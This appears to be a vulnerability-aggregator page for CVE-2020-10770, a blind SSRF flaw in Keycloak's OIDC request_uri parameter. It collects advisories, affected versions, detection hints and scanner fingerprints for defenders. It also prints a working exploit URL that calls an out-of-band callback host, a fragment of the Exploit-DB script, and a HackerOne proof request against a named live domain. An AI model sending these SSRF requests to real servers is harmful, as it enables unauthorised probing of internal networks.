CVE-2020-10770
published 2020-12-15CVE-2020-10770: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This…
PriorityP276medium5.3CVSS 3.1
AVNACLPRNUINSUCNILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
69.72%
99.3th percentile
A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | lemonldap-ng | < lemonldap-ng 2.16.1+ds-deb12u2 (bookworm) | lemonldap-ng 2.16.1+ds-deb12u2 (bookworm) |
| lemonldap-ng | lemonldap | < 2.17.1 | 2.17.1 |
| redhat | keycloak | < 12.0.2 | 12.0.2 |
Detection & IOCsextracted from sources · hover to see the quote
url/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/↗
- →Monitor for outbound HTTP requests triggered by the OIDC `request_uri` parameter in Keycloak's OpenID Connect auth endpoint; an unauthenticated GET to `/auth/realms/master/protocol/openid-connect/auth` with a `request_uri` pointing to an external/internal host is the attack pattern. ↗
- →Shodan/FOFA fingerprinting for exposed Keycloak instances: search for `http.html:"keycloak"`, `http.title:"keycloak"`, or favicon hash `-1105083093` to identify attack surface. ↗
- →The Nuclei template matcher confirms exploitation by checking for an HTTP interaction on the interactsh protocol, meaning any HTTP callback to the OOB URL confirms the server fetched the attacker-supplied `request_uri`. ↗
- ·The vulnerability is exploitable only when the default client configuration for `security-admin-console` is present and the `request_uri` OIDC parameter is not restricted; fixed in Keycloak 13.0.0+. ↗
- ·The exploit is unauthenticated — no credentials are required to trigger the SSRF via the public OpenID Connect authorization endpoint. ↗
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
osv5.3MEDIUM
vulncheck5.3MEDIUM
vendor_debian5.3MEDIUM
vendor_redhat5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fmg2-2hq5-5jxf: A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2
ghsa_unreviewed·2023-09-29·CVSS 5.3
CVE-2023-44469 [MEDIUM] CWE-918 GHSA-fmg2-2hq5-5jxf: A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2
A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2.17.1 allows authenticated remote attackers to send GET requests to arbitrary URLs through the request_uri authorization parameter. This is similar to CVE-2020-10770.
OSV
CVE-2023-44469: A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2
osv·2023-09-29·CVSS 5.3
CVE-2023-44469 [MEDIUM] CVE-2023-44469: A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2
A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2.17.1 allows authenticated remote attackers to send GET requests to arbitrary URLs through the request_uri authorization parameter. This is similar to CVE-2020-10770.
GHSA
Keycloak vulnerable to Server-Side Request Forgery
ghsa·2022-05-24
CVE-2020-10770 [MEDIUM] CWE-601 Keycloak vulnerable to Server-Side Request Forgery
Keycloak vulnerable to Server-Side Request Forgery
A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter `request_uri`. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
OSV
Keycloak vulnerable to Server-Side Request Forgery
osv·2022-05-24
CVE-2020-10770 [MEDIUM] Keycloak vulnerable to Server-Side Request Forgery
Keycloak vulnerable to Server-Side Request Forgery
A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter `request_uri`. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
VulnCheck
Red Hat keycloak Server-Side Request Forgery (SSRF)
vulncheck·2020·CVSS 5.3
CVE-2020-10770 [MEDIUM] Red Hat keycloak Server-Side Request Forgery (SSRF)
Red Hat keycloak Server-Side Request Forgery (SSRF)
A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
Affected: Red Hat keycloak
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2020-10770; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnerability=cve-2020-10770; https://da
Debian
CVE-2023-44469: lemonldap-ng - A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::N...
vendor_debian·2023·CVSS 5.3
CVE-2023-44469 [MEDIUM] CVE-2023-44469: lemonldap-ng - A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::N...
A Server-Side Request Forgery issue in the OpenID Connect Issuer in LemonLDAP::NG before 2.17.1 allows authenticated remote attackers to send GET requests to arbitrary URLs through the request_uri authorization parameter. This is similar to CVE-2020-10770.
Scope: local
bookworm: resolved (fixed in 2.16.1+ds-deb12u2)
bullseye: resolved (fixed in 2.0.11+ds-4+deb11u5)
forky: resolved (fixed in 2.17.1+ds-1)
sid: resolved (fixed in 2.17.1+ds-1)
trixie: resolved (fixed in 2.17.1+ds-1)
Red Hat
keycloak: Default Client configuration is vulnerable to SSRF using "request_uri" parameter
vendor_redhat·2020-11-26·CVSS 5.3
CVE-2020-10770 [MEDIUM] CWE-918 keycloak: Default Client configuration is vulnerable to SSRF using "request_uri" parameter
keycloak: Default Client configuration is vulnerable to SSRF using "request_uri" parameter
A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
A flaw was found in Keycloak, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
Package: keycloak (Red Hat Decision Manager 7) - Not affected
Package: keycloak (Red Hat Fuse 7) - Not affected
Package: keycloak (Red Hat OpenShift Application Runtimes) - Not affected
Package: ke
No detection rules found.
Exploit-DB
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
exploitdb·2021-10-13·CVSS 5.3
CVE-2020-10770 [MEDIUM] Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
---
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Date: 2021-10-09
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.keycloak.org/
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
# Version: versions 192.168.0.1:4444
'''))
parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
args = parser.parse_args()
if len(sys.argv) ")
_req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
return
Nuclei
Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
nuclei·CVSS 5.3
CVE-2020-10770 [MEDIUM] Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
Template:
id: CVE-2020-10770
info:
name: Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
author: dhiyaneshDk
severity: medium
description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or fur
Qualys
Identify Server-Side Attacks Using Qualys Periscope | Qualys
blogs_qualys·2022-12-01·CVSS 8.8
[HIGH] Identify Server-Side Attacks Using Qualys Periscope | Qualys
#### Table of Contents
- Potential False Positives
- Potential False Negatives
Qualys previously announced the introduction of Qualys Periscope in 2020. This technology allows Qualys Web Application Scanning (WAS) to detect out-of-band vulnerabilities such as server-side request forgery (SSRF). Qualys Periscope provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to Qualys Periscope. This article will provide more detail on the common questions/situations seen with out-of-band detections.
As of publishing, the vulnerability detections that utilize Qualys Periscope are:
- QID 150055 – OS Command Injection
- QID 150179 – Blind XXE injection
Qualys
Identify Server-Side Attacks Using Qualys Periscope
blogs_qualys·2022-12-01·CVSS 8.8
[HIGH] Identify Server-Side Attacks Using Qualys Periscope
## Table of Contents
Potential False Positives
Potential False Negatives
Qualys previously announced the introduction of Qualys Periscope in 2020. This technology allows Qualys Web Application Scanning (WAS) to detect out-of-band vulnerabilities such as server-side request forgery (SSRF). Qualys Periscope provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to Qualys Periscope . This article will provide more detail on the common questions/situations seen with out-of-band detections.
As of publishing, the vulnerability detections that utilize Qualys Periscope are:
QID 150055 – OS Command Injection
QID 150179 – Blind XXE injection
QID 15
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
HackerOne
SSRF Keycloak before 13.0.0 - CVE-2020-10770 on https://sponsoredata.mtn.ci
hackerone·2024-09-26·CVSS 5.3
CVE-2020-10770 [MEDIUM] SSRF Keycloak before 13.0.0 - CVE-2020-10770 on https://sponsoredata.mtn.ci
SSRF Keycloak before 13.0.0 - CVE-2020-10770 on https://sponsoredata.mtn.ci
##Vulnerable Website URL or Application:
https://sponsoredata.mtn.ci
##Description of Security Issue:
A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.
##Steps needed to reproduce bug:
1.Using Burp Suite with Burp Collaborator send this request:
* https://sponsoredata.mtn.ci:8443/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://0rs71imlpr20qx2svt6gfrotakga4z.burpcollaborator.net
{F149
Bugzilla
CVE-2020-10770 keycloak: Default Client configuration is vulnerable to SSRF using "request_uri" parameter
bugzilla·2020-06-11·CVSS 5.3
CVE-2020-10770 [MEDIUM] CVE-2020-10770 keycloak: Default Client configuration is vulnerable to SSRF using "request_uri" parameter
CVE-2020-10770 keycloak: Default Client configuration is vulnerable to SSRF using "request_uri" parameter
The "request_uri" is an optional parameter in the OIDC Authentication Request that allows to specify an external URI where the Request object may be found. As the Identity Provider is supposed to request the external Request object, this parameter can be easily used to launch a SSRF attack against the IdP.
https://issues.redhat.com/browse/KEYCLOAK-14019
Discussion:
Acknowledgments:
Name: Lauritz Holtmann (@_lauritz_ ) (Chair for Network and Data Security at Ruhr University Bochum)
---
This issue has been addressed in the following products:
Red Hat Single Sign-On 7.4 for RHEL 6
Via RHSA-2021:0318 https://access.redhat.com/errata/RHSA-2021:0318
---
This issue has been address
2020-12-15
Published
Exploited in the wild